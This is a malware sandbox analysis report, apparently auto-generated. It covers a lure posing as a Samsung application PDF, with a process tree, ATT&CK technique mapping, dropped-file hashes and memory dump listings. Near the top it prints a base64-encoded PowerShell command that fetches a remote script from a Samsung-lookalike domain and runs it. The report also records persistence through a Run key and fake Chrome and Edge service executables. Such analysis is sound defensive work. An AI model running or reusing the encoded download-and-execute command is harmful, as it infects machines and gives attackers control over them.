        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvAHMAdABvAHIAYQBnAGUALwBTAGEAbQBzAHUAbgBnAHMAdAAuAHQAeAB0ACcAKQA=
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4748
    - - C:\Users\Public\Downloads\ChromeServices\ChromeServices.exe
        
        "C:\Users\Public\Downloads\ChromeServices\ChromeServices.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
851c0018813dacc2c47ad9fc74a4546b

SHA1
140c3d0be48be364bc270016c8ca38f55ab8ebb1

SHA256
b1ac8fc77f9f7c5099583806d68961d538636f9f6a7939a836e08d308e7217f1

SHA512
3ce43a1057f12573da865a90f6c0c0ad8ab3dffd1242903ba4bf876211f95e44eae595090aa6812aac41403c6ce344fa554e790e87c272c169b37b0eb05062e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56c43715e0e7fa58012d8a5769d8d568

SHA1
4370ca3436f2e3a95b47a728503a2c22a5a5fa39

SHA256
8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

SHA512
b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Filesize
942B

MD5
08fd55ab7b211d3fba9ba080bb93fc07

SHA1
3519a855c1d90857159c68422848785d68a89591

SHA256
eb1d1fa6b376f369681435d4e310dc2e6e832877a6e2880640727f9390559614

SHA512
61c362ac9ac9809532be0383eb239e06290b1387bc6e49e0ab0045bd7e4b904032f8def000d4b1e4800b6387c193f4ab78f8c507138030490014104cecb726d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7757596efd8adc4b9440cba00ecf04fe

SHA1
6617bdaa4e6d2a3dc6ce7b24310636e5cc254495

SHA256
ab12d282e84c79bf61664af591caaa05e3475e465199a1e1950e20dfb93ae9c2

SHA512
7654c949bb1189096bff3c340a07e91a208fb9e989b2ab06b44661e2afeea64edf54770ebf00d7653d6a623b53f4483b7bf6e4f4c5037b5cc2cf09c3e7dbfdb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d9354c0ecc25cc536dc17cf104e5812d

SHA1
d7a6ea646eedf560966406ddd533382b58423877

SHA256
001b0722e5c2c8005bf6b0b265c80be6a95ad9884833957b14f0b624e90ee6ee

SHA512
49f9c17d0b86ed4180e0dc6705d350a6cea6906a604efefdb2096697742b5070aed8e48cfaa8a78edc067ddb2d65c941ea8c41fb5ba3c174ac5af97470b0ce6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9399ddf7936e2c8c37469cb992f13cac

SHA1
6059d9461ba5d18dc021bc28763cfa19ae229ba8

SHA256
238533bba2b42ec24fd9eaacda5f3129d38612ddbce720111f7ed0d2ce0efd3f

SHA512
c1ca5ced8fd9f80ceb87427fcf43f06a752ca8a53385b4d9fa3e5ad111ac4c260cd7f45cf613da23dd716f091895fcee59e8a115515897dfa19ff01435cacf9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fcil2jiu.gkh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\DataLogs\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Users\Admin\Downloads\Samsung Application Document.pdf

Filesize
169KB

MD5
6ad6f2d87f840933f4aa223ebe9e07bf

SHA1
c398243a598bec2f287d3744ebf1e222b750259a

SHA256
22b508e548276b58c69cdc3a1aec6059e1a4c91dd29bf529ff04356892263893

SHA512
64ebf8153b8ad5018faf42f659caac29f8308fba69ab7c9dcd6ba41a156ea129a34a1e9a1950753c44e7a3eb8138dc3d1343a4ae42206ae7f0d561604943eac0

Download Submit
C:\Users\Public\Downloads\ChromeServices\ChromeServices.exe

Filesize
67KB

MD5
d82b8f0cb601039af7c1968b0c92d09f

SHA1
b0105f082e10791e6703abbc064904be073dc79b

SHA256
962c0f879de9a12a78ea81536e7223ec7a7c8a9d5828871b6fdd26e649401755

SHA512
be063f8590951e8d4b6f1e69cac57a95d90d3ab96576545afe4141979d376c322047d0b73169140b22ef6d24a7e9c5b4fe09771a4fedfd36ce544befafa65e33

Download Submit
C:\Users\Public\Downloads\ChromeServices\libpsl-5.dll

Filesize
1.4MB

MD5
2c943a56f651991c0d86073d1c518ee9

SHA1
a9d50ae42039053fb4e15ab89fd482216677ea5d

SHA256
3c239867aaa0269c47aaf3abee15a811ff5d93af37d45ba876196572bff3087c

SHA512
7398377768bf1ae4f94b149664e2bb889fed7c46ff68cde9a5365719bad135f52d06ac3c98b8136b330f82e439e21bb879bb9a38e477e18ad1e1481b46a99573

Download Submit
C:\Users\Public\Downloads\EdgeServices\EdgeServices.exe

Filesize
3.8MB

MD5
c0d4b133e4f2a2f82b73b67d09ad66aa

SHA1
c21a4fcfd86194471cd25fac5e306809ac1df5a8

SHA256
3fe4878d8399f6fb7632b9325559d1bb38c3a17aac7a60f667c1e5f90b865248

SHA512
1738110c7e276d46fd8c2a07eba5b361370e2da6bbf0e5fcab5491bd43bdc0c0579b547630eb5c7916fd7fb0efd442a1b834efb9ecbaf49e5800e707aab730d7

Download Submit
C:\Users\Public\Downloads\EdgeServices\concrt140e.dll

Filesize
2.3MB

MD5
da1f9f870250c307bd520e3ef31a3615

SHA1
40b98482baa688f7d18b8e112b995ec3dc400b35

SHA256
fb9f727ca314b03952001dbe4dffa2838cd60c0ccfa31672894105fc36061b47

SHA512
2079b9885212f3ed899ee6c3c953119638011bf09b9a00813c4a4f408452bab6f0c1daad9a8bd70633e66c363d17afcc141134df436dc13b3489d5e07c9a16f5

Download Submit
C:\Users\Public\Downloads\EdgeServices\libiconv-2.dll

Filesize
1.1MB

MD5
28c28885656c64fc5ed923cc97c77718

SHA1
71f4b7e06010f8f4d975ad6e2c919b56801447f3

SHA256
967189adfbc889fde89aafc867f7a1f02731f8592cf6fd5a4ace1929213e2e13

SHA512
eaa8888faa1c6e1a121061b4b110a49904e0553265eaf445e18c0bb283ad72774d25557a8e64648f69fb7822d6913924cb54bfe67a0dd2a8069701807f7bc488

Download Submit
C:\Users\Public\Downloads\EdgeServices\libintl-8.dll

Filesize
184KB

MD5
e3f805c0b24a800c30a63e36e6153ad1

SHA1
639f3f22b2a885335c8973d35b0923be979b621f

SHA256
42a63cb4c3c28a683d9f6c3510de5ec17849eb18c097fa02cd78aeb800bff202

SHA512
7aa18d7160301d99f14bf9d53325d417199da767b73586dcf366b740c1ff8411b98768ec1440d76c70e3dd2f103d7083fa0c211fd7b24abeb06b30d67ad9ea72

Download Submit
C:\Users\Public\Downloads\EdgeServices\libpcre2-8-0.dll

Filesize
632KB

MD5
85f53770310c4b06becb458a905ca1cb

SHA1
200bb544b443e99464eff17ede7cc53712fbd0e1

SHA256
d45bc483e00500e9a847466f54a6a54d86148b71330fc133d4380389513f146f

SHA512
728ac8b102a12a7d37f7df55ef379cf36bfca55cb7c6f9563e324ff1cfa77815a7137a4707f3df5d5938619080503c8399df03b12639e85ba4500da9d442f6e0

Download Submit
C:\Users\Public\Downloads\EdgeServices\libwinpthread-1.dll

Filesize
1.4MB

MD5
ba1c9e123a9a9c75bb38f3c3534b1dbf

SHA1
0154c93f11db81dfe5ceda4e504adbab9ed2cdf9

SHA256
d0218344f310e412220313a7a14f49aec23f4428c6b9cf944dd2ea2ca57222b0

SHA512
7b2a9229626dcd18b4c26ab5c6b83790425d3f5d5a9fab298109412f1efe07c5bc29e23be7191417865b15877e14e87975c689fab9823ce3e1b3db79c18a7133

Download Submit
C:\Users\Public\Downloads\EdgeServices\zlib1.dll

Filesize
117KB

MD5
66a3477a51e8b7d4586edf4659cde8d5

SHA1
3306c6aca3937d8bca11dd076effb03746367b9f

SHA256
cb7ab3788d10940df874acd97b1821bbb5ee4a91f3eec11982bb5bf7a3c96443

SHA512
948ba42499bba17b552723c3189289e9f07879c9303ec6f27b4d631b7d701c16fe66fc8c6a681236cef778b0cb0a14420493e048aa90bba682606ce2990c64ab

Download Submit
memory/116-152-0x00000000069A0000-0x0000000006A3C000-memory.dmp

Filesize
624KB

Download
memory/116-134-0x0000000005810000-0x000000000581A000-memory.dmp

Filesize
40KB

Download
memory/116-133-0x0000000005850000-0x00000000058E2000-memory.dmp

Filesize
584KB

Download
memory/116-153-0x0000000006A40000-0x0000000006AA6000-memory.dmp

Filesize
408KB

Download
memory/1524-119-0x00007FF7A48A0000-0x00007FF7A4CD7000-memory.dmp

Filesize
4.2MB

Download
memory/1524-120-0x00007FFC9B860000-0x00007FFC9B979000-memory.dmp

Filesize
1.1MB

Download
memory/1524-121-0x00007FFC9E500000-0x00007FFC9E5A5000-memory.dmp

Filesize
660KB

Download
memory/1524-123-0x00007FFC9E4D0000-0x00007FFC9E4F4000-memory.dmp

Filesize
144KB

Download
memory/1524-122-0x00007FFCA6400000-0x00007FFCA6435000-memory.dmp

Filesize
212KB

Download
memory/1528-116-0x0000000005740000-0x0000000005CE4000-memory.dmp

Filesize
5.6MB

Download
memory/2120-255-0x000000000C620000-0x000000000C76D000-memory.dmp

Filesize
1.3MB

Download
memory/4016-254-0x00007FF6B78A0000-0x00007FF6B78B4000-memory.dmp

Filesize
80KB

Download
memory/4040-40-0x00007FFCA5840000-0x00007FFCA6301000-memory.dmp

Filesize
10.8MB

Download
memory/4040-0-0x00007FFCA5843000-0x00007FFCA5845000-memory.dmp

Filesize
8KB

Download
memory/4040-39-0x00007FFCA5843000-0x00007FFCA5845000-memory.dmp

Filesize
8KB

Download
memory/4040-12-0x00007FFCA5840000-0x00007FFCA6301000-memory.dmp

Filesize
10.8MB

Download
memory/4040-253-0x00007FFCA5840000-0x00007FFCA6301000-memory.dmp

Filesize
10.8MB

Download
memory/4040-11-0x00007FFCA5840000-0x00007FFCA6301000-memory.dmp

Filesize
10.8MB

Download
memory/4040-10-0x0000018BC2E80000-0x0000018BC2EA2000-memory.dmp

Filesize
136KB

Download
memory/4448-22-0x0000028FD26C0000-0x0000028FD2882000-memory.dmp

Filesize
1.8MB

Download
memory/4712-99-0x0000000000400000-0x000000000064A000-memory.dmp

Filesize
2.3MB

Download